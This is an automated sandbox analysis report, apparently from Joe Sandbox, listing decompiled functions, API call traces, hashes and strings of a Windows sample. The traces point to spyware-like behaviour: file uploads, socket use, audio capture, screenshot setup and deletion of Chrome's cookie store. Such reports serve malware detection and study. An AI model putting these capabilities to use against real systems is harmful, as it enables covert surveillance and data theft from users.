                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CAF5
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CB06
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CB1A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CB26
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$D@2@@0@Hstd@@V?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@V10@0@V10@@$?begin@?$basic_string@?length@?$basic_string@V10@$??2@?end@?$basic_string@CreateFileG@1@@LocalTimeprintf
                                                • String ID: Failed to upload file: $Uploaded file: $[ERROR]$[INFO]
                                                • API String ID: 3287160187-712855673
                                                • Opcode ID: a1d25d8f91a5aa3a43bb048e395060911ec9b41036ded84efffd755b25654cf9
                                                • Instruction ID: 12224a6c5044153e60b47b7b8b22c70b5aff875ca01352e6d0e6ba24b0a9ab79
                                                • Opcode Fuzzy Hash: a1d25d8f91a5aa3a43bb048e395060911ec9b41036ded84efffd755b25654cf9
                                                • Instruction Fuzzy Hash: F1414F71900118ABDB14FBA1DC96DEE773CAB50306F0045AEF516A20A2EE385B85CF59
                                                Function 0040CFB2 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 112COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6C995E08,00000002,00000001), ref: 0040CFEA
                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 0040CFFC
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 0040D011
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D01B
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040D025
                                                • _wrename.MSVCRT ref: 0040D02C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D043
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894), ref: 0040D05D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D074
                                                  • Part of subcall function 004031ED: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00403203
                                                  • Part of subcall function 004031ED: FindFirstFileW.KERNEL32(00000000), ref: 0040320A
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,?,?), ref: 00403237
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00403241
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403258
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403375
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040337E
                                                  • Part of subcall function 004031ED: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403387
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,?,0041498C), ref: 0040D09B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,0041498C), ref: 0040D0A5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,0041498C), ref: 0040D0BF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D0C8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D0D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@G@2@@std@@$??1?$basic_string@$D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@D@2@@0@$??0?$basic_string@V10@0@$G@2@@0@V01@@V10@$??2@?length@?$basic_string@?rfind@?$basic_string@?substr@?$basic_string@FileFindFirstG@1@@V10@@V12@_wrename
                                                • String ID: Unable to rename file!
                                                • API String ID: 1823037954-1452241502
                                                • Opcode ID: d0f4c173e57031bc07afc8f6764ca3c21498b33cdb1541796f51a5575a0bbaa9
                                                • Instruction ID: 1e98e751280b6c33166822e53399df0344e94b3bf9c8faeafb357a345ac408a3
                                                • Opcode Fuzzy Hash: d0f4c173e57031bc07afc8f6764ca3c21498b33cdb1541796f51a5575a0bbaa9
                                                • Instruction Fuzzy Hash: CE314F72901119AFCF04FFA0EC4A9EE7738EB14305F1045BAF502A20A1EE785B48CB59
                                                Function 00401528 Relevance: 30.1, APIs: 20, Instructions: 118threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401536
                                                • closesocket.WS2_32 ref: 00401561
                                                • ExitThread.KERNEL32 ref: 0040156F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,00419288,00000000), ref: 00401598
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004191F8,00000012,?,00419288,00000000), ref: 004015AE
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004015B9
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004015C6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004015D3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004015E0
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004015EC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004015F5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004015FE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401607
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401610
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401619
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401622
                                                • waveInUnprepareHeader.WINMM(-004191BC,00000020), ref: 0040163F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401664
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004016AE
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                                • String ID:
                                                • API String ID: 3470141593-0
                                                • Opcode ID: d8c501ab1854760ca6ac13045f06aa9764cfa75bd814278a5828c8da87223c58
                                                • Instruction ID: e83644768408e7e800a9075f0c35efe2669a5e6e9277dde0074148620c4dfc27
                                                • Opcode Fuzzy Hash: d8c501ab1854760ca6ac13045f06aa9764cfa75bd814278a5828c8da87223c58
                                                • Instruction Fuzzy Hash: 4041517280010ABBDB00EFA4DD5E9DE3B78FB15305F148176F502A21A1EB799F54CB99
                                                Function 0040F8FF Relevance: 27.1, APIs: 18, Instructions: 127COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040F90E
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6C995E04), ref: 0040F929
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040F93A
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0040F94A
                                                  • Part of subcall function 0040F50A: GdiplusStartup.GDIPLUS(00419E14,?,00000000,00000000,00000000,00000000), ref: 0040F53C
                                                  • Part of subcall function 0040F50A: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040F550
                                                  • Part of subcall function 0040F50A: GetProcAddress.KERNEL32(00000000), ref: 0040F557
                                                  • Part of subcall function 0040F50A: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F573
                                                  • Part of subcall function 0040F50A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419E78), ref: 0040F5B0
                                                  • Part of subcall function 0040F50A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F7B2
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040F96B
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0040F979
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 0040F98C
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 0040F99F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FA5A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FA63
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@AddressGdiplusLibraryLoadProcStartupV01@@V12@
                                                • String ID:
                                                • API String ID: 1942891133-0
                                                • Opcode ID: f2933705df77b0e2cc4e1a4fd4c52bb1d0334aa9faa4d24cd1d278faf23e96bc
                                                • Instruction ID: ecf60d155a116e3c2cc7972ff90b6a831e97ece962ed6d78678408e1aaa902ca
                                                • Opcode Fuzzy Hash: f2933705df77b0e2cc4e1a4fd4c52bb1d0334aa9faa4d24cd1d278faf23e96bc
                                                • Instruction Fuzzy Hash: 91415D36800208AFCF11AFE4DC59AEC7F75FF19301F048076E952B61A2EB395A19DB19
                                                Function 0040D832 Relevance: 27.1, APIs: 18, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardLayoutNameA.USER32(00000000), ref: 0040D841
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D84C
                                                  • Part of subcall function 00411A24: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00411A3E
                                                  • Part of subcall function 0041127D: _itoa.MSVCRT ref: 0041129B
                                                  • Part of subcall function 0041127D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00000000,00419288,00000000,00419288,?,00419288,?), ref: 004112AF
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D88E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D8A3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040D8B3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D8C3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D8D3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D8E3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D8ED
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040D907
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D913
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D91F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D92B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D937
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D943
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                                • String ID:
                                                • API String ID: 3751107300-0
                                                • Opcode ID: 526eef5d35fd45c513a6e802abff52db5288f3278a7a7a24ec9274a9bf42a7c8
                                                • Instruction ID: 4ed70ea5339a062afd801ee0b40d05d60a16ddb86cab22ed749d3ee612a63b80
                                                • Opcode Fuzzy Hash: 526eef5d35fd45c513a6e802abff52db5288f3278a7a7a24ec9274a9bf42a7c8
                                                • Instruction Fuzzy Hash: 0A313E7280011A9BCB04BBA1DD5E9DF777CEB55305F0081BAF106E30A1EE789B488F59
                                                Function 00406511 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 68fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • getenv.MSVCRT ref: 00406526
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406531
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040653C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406547
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406550
                                                • DeleteFileA.KERNEL32(00000000), ref: 00406557
                                                • GetLastError.KERNEL32 ref: 00406561
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],?,?,?,?,00000000), ref: 00406582
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 00406595
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],?,?,?,?,00000000), ref: 004065BB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004065D0
                                                Strings
                                                • UserProfile, xrefs: 00406521
                                                • [Chrome Cookies found, cleared!], xrefs: 004065B6
                                                • [Chrome Cookies not found], xrefs: 0040657D
                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040651B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                • API String ID: 3740952235-304995407
                                                • Opcode ID: 423b4a1d3d8974d23b5f632d54bb964bfc9f694fcf3f9d77df3e111937160552
                                                • Instruction ID: 568e214f5b20e8abe362b83e159d7df5a4ee18145c0e93773571f910f025de9b
                                                • Opcode Fuzzy Hash: 423b4a1d3d8974d23b5f632d54bb964bfc9f694fcf3f9d77df3e111937160552
                                                • Instruction Fuzzy Hash: CF115175640104ABCB00BFA4ED1AAEE7738EB05702F104076E403F21D0EE395B08CBAA
                                                Function 00410CD2 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 61timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
